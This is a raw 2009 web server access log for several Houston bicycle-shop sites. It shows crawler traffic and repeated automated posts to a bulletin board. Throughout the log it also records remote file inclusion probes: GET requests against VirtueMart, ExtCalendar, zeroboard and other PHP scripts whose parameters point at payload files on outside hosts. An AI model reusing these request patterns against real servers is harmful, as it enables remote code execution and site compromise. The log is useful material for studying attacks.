91.121.150.170 - - [10/May/2009:23:19:02 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
119.63.194.59 - - [10/May/2009:23:20:46 -0700] "GET /bullitinboard/viewtopic.php?p=13811 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
119.63.194.59 - - [10/May/2009:23:20:47 -0700] "GET /bullitinboard/viewtopic.php?p=13188 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
119.63.194.59 - - [10/May/2009:23:22:34 -0700] "GET /bullitinboard/viewtopic.php?p=14935 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:23:25:52 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:23:25:52 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:23:30:10 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
72.30.78.244 - - [10/May/2009:23:34:31 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
119.63.194.59 - - [10/May/2009:23:44:13 -0700] "GET /bullitinboard/viewtopic.php?p=13425 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:23:45:20 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/May/2009:23:51:29 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
119.63.194.59 - - [11/May/2009:00:09:07 -0700] "GET /bullitinboard/viewtopic.php?p=14992 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
81.19.66.38 - - [11/May/2009:00:13:18 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:00:13:19 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:00:13:20 -0700] "GET /bullitinboard/viewtopic.php?p=1662 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:00:13:21 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:00:13:21 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
91.121.150.170 - - [11/May/2009:00:22:00 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/May/2009:00:33:53 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/May/2009:00:40:06 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
119.63.194.59 - - [11/May/2009:00:44:16 -0700] "GET /bullitinboard/viewtopic.php?p=13357 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
81.19.66.38 - - [11/May/2009:00:59:35 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:00:59:36 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:00:59:37 -0700] "GET /bullitinboard/viewtopic.php?p=1662 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:00:59:37 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:00:59:38 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
119.63.194.59 - - [11/May/2009:01:09:11 -0700] "GET /bullitinboard/viewtopic.php?p=14848 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
119.63.194.59 - - [11/May/2009:01:44:19 -0700] "GET /bullitinboard/viewtopic.php?p=11924 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
146.164.4.136 - - [11/May/2009:02:15:35 -0700] "GET /logs/errors.php?error=http://arsenal-music.ru/modules/mod_poll/tmpl/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
146.164.4.136 - - [11/May/2009:02:15:40 -0700] "GET /logs/access.log/errors.php?error=http://arsenal-music.ru/modules/mod_poll/tmpl/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
146.164.4.136 - - [11/May/2009:02:15:40 -0700] "GET /errors.php?error=http://arsenal-music.ru/modules/mod_poll/tmpl/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.205.208.138 - - [11/May/2009:02:22:55 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/index.php" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "houstonbikeshop.com"
201.205.208.138 - - [11/May/2009:02:22:56 -0700] "GET / HTTP/1.0" 200 1748 "http://houstonbikeshop.com/" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "houstonbikeshop.com"
201.205.208.138 - - [11/May/2009:02:22:57 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "houstonbikeshop.com"
66.41.253.80 - - [11/May/2009:02:24:49 -0700] "GET /bullitinboard/viewtopic.php?t=2359&view=previous&sid=a2f5a9e653f8add278ce8e5bc7e29f2b HTTP/1.0" 200 438 "http://bicyclestoreshouston.com/bullitinboard/viewtopic.php?t=2359&view=previous&sid=a2f5a9e653f8add278ce8e5bc7e29f2b" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "bicyclestoreshouston.com"
81.19.66.38 - - [11/May/2009:02:25:59 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:02:26:00 -0700] "GET /bullitinboard/viewtopic.php?p=1662 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:02:26:01 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:02:26:01 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:02:26:02 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
88.84.147.205 - - [11/May/2009:02:42:43 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.fahrschule-km.de/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
88.84.147.205 - - [11/May/2009:02:42:44 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.fahrschule-km.de/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
88.84.147.205 - - [11/May/2009:02:42:44 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.fahrschule-km.de/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [11/May/2009:03:06:45 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/May/2009:03:06:57 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/May/2009:03:17:54 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/May/2009:03:21:55 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/May/2009:03:25:11 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [11/May/2009:03:27:48 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/May/2009:03:29:05 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [11/May/2009:03:37:04 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/May/2009:03:42:13 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
196.12.36.225 - - [11/May/2009:03:43:33 -0700] "GET /bullitinboard/viewtopic.php?t=2208&highlight= HTTP/1.1" 200 533 "http://www.topkasinogaming.com/barakasinomjukvaratournament.html" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)" "www.svbikes.com"
91.121.150.170 - - [11/May/2009:03:49:05 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [11/May/2009:03:51:44 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
65.55.51.114 - - [11/May/2009:03:52:39 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/May/2009:03:57:58 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
212.150.52.114 - - [11/May/2009:04:04:41 -0700] "GET /virtuemart112/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
212.150.52.114 - - [11/May/2009:04:04:41 -0700] "GET /logs/access.log//virtuemart112/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
212.150.52.114 - - [11/May/2009:04:04:41 -0700] "GET /logs//virtuemart112/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
212.150.52.114 - - [11/May/2009:04:04:49 -0700] "GET /virtuemart112/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
212.150.52.114 - - [11/May/2009:04:04:49 -0700] "GET /logs//virtuemart112/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
212.150.52.114 - - [11/May/2009:04:04:49 -0700] "GET /logs/access.log//virtuemart112/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.30.79.122 - - [11/May/2009:04:18:05 -0700] "GET /bullitinboard/viewtopic.php?p=4512 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
72.30.79.122 - - [11/May/2009:04:52:38 -0700] "GET /bullitinboard/viewtopic.php?p=1970 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:04:59:33 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:04:59:34 -0700] "GET /bullitinboard/viewtopic.php?p=1662 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:04:59:35 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:04:59:36 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:04:59:36 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
217.199.222.19 - - [11/May/2009:05:09:45 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.199.222.19 - - [11/May/2009:05:09:45 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.199.222.19 - - [11/May/2009:05:09:45 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
86.54.102.45 - - [11/May/2009:05:45:57 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
86.54.102.45 - - [11/May/2009:05:45:57 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
86.54.102.45 - - [11/May/2009:05:45:57 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
193.189.250.41 - - [11/May/2009:06:02:02 -0700] "GET /translations/French.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kimstroy.by//assets/images/r.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "bicyclestoreshouston.com"
193.189.250.41 - - [11/May/2009:06:02:03 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kimstroy.by//assets/images/r.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "bicyclestoreshouston.com"
193.189.250.41 - - [11/May/2009:06:02:03 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.kimstroy.by//assets/images/r.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "bicyclestoreshouston.com"
75.127.68.192 - - [11/May/2009:06:04:55 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
75.127.68.192 - - [11/May/2009:06:04:55 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
75.127.68.192 - - [11/May/2009:06:04:55 -0700] "GET /appserv/main.php?appserv_root=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:06:06:10 -0700] "GET /bullitinboard/viewtopic.php?p=1662 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:06:06:11 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:06:06:12 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:06:06:12 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/May/2009:06:06:13 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
86.54.102.45 - - [11/May/2009:06:06:27 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
86.54.102.45 - - [11/May/2009:06:06:27 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
86.54.102.45 - - [11/May/2009:06:06:27 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [11/May/2009:06:13:39 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [11/May/2009:06:13:39 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [11/May/2009:06:13:39 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [11/May/2009:06:14:51 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [11/May/2009:06:14:51 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [11/May/2009:06:14:51 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gymnasticscoaching.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.118.194.225 - - [11/May/2009:06:15:00 -0700] "GET /logs/access.log//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "houstonbikeshop.com"
210.118.194.225 - - [11/May/2009:06:15:01 -0700] "GET /?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "houstonbikeshop.com"
91.121.150.170 - - [11/May/2009:06:22:25 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/May/2009:06:40:40 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/May/2009:06:47:48 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
110.45.144.106 - - [11/May/2009:07:02:25 -0700] "GET /errors.php?error=http://shw.or.kr/bbs/bbs_public/06notice/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "houstonbikeshop.com"
110.45.144.106 - - [11/May/2009:07:02:25 -0700] "GET /logs/errors.php?error=http://shw.or.kr/bbs/bbs_public/06notice/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "houstonbikeshop.com"
91.121.150.170 - - [11/May/2009:07:03:29 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/May/2009:07:04:18 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
221.139.1.251 - - [11/May/2009:07:11:46 -0700] "GET /translations/Japanese.txt%20%20//tools/send_reminders.php?includedir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.1.251 - - [11/May/2009:07:11:46 -0700] "GET /translations//tools/send_reminders.php?includedir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.1.251 - - [11/May/2009:07:11:46 -0700] "GET /tools/send_reminders.php?includedir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [11/May/2009:07:18:03 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/May/2009:07:19:37 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/May/2009:07:24:26 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [11/May/2009:07:26:00 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
62.140.23.192 - - [11/May/2009:07:27:43 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.140.23.192 - - [11/May/2009:07:27:43 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
91.121.150.170 - - [11/May/2009:07:31:49 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
70.216.94.65 - - [11/May/2009:07:47:47 -0700] "GET / HTTP/1.1" 200 1764 "http://www.cannondale.com/redirect.html?url=www.svbikes.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.svbikes.com"
70.216.94.65 - - [11/May/2009:07:47:50 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.svbikes.com"
91.121.150.170 - - [11/May/2009:07:48:31 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
70.216.94.65 - - [11/May/2009:07:48:34 -0700] "GET / HTTP/1.1" 200 1764 "http://www.cannondale.com/redirect.html?url=www.svbikes.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.svbikes.com"
91.121.150.170 - - [11/May/2009:07:55:18 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
122.153.212.195 - - [11/May/2009:07:59:15 -0700] "GET /logs/access.log//?_zb_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "houstonbikeshop.com"
122.153.212.195 - - [11/May/2009:07:59:20 -0700] "GET /logs//?_zb_path=http://www.project80s.com/id.gif??? HTTP/1.1" 200 2373 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "houstonbikeshop.com"
